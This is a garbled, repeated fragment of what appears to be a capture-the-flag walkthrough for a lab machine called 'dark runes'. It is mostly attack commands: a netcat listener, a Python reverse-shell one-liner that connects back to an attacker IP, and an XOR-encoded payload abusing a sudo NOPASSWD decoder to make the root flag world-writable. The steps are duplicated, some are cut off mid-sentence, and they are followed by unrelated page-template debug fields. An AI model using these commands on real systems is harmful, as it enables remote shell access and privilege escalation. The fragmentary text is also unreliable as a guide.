✅ RCE achieved. Get a reverse shell:
User flag: user.txt in /home/admin . Run sudo -l → (root) NOPASSWD: /usr/local/bin/rune_decoder /var/runes/* htb dark runes
# Listener nc -lvnp 4444 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.XX",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);' ✅ RCE achieved
echo -n "RUNECMD:chmod 777 /root/root.txt" > payload python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune Move to /var/runes/evil.rune and run: and your hashes always crack. 🔥
May your shell never drop, and your hashes always crack. 🔥
✅ RCE achieved. Get a reverse shell:
User flag: user.txt in /home/admin . Run sudo -l → (root) NOPASSWD: /usr/local/bin/rune_decoder /var/runes/*
# Listener nc -lvnp 4444 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.XX",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'
echo -n "RUNECMD:chmod 777 /root/root.txt" > payload python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune Move to /var/runes/evil.rune and run:
May your shell never drop, and your hashes always crack. 🔥
print page name : home
print page url : /en/home
dcr path:
isFooterOff : true
isFooterOff1 : false
isItAmazonCobrand : false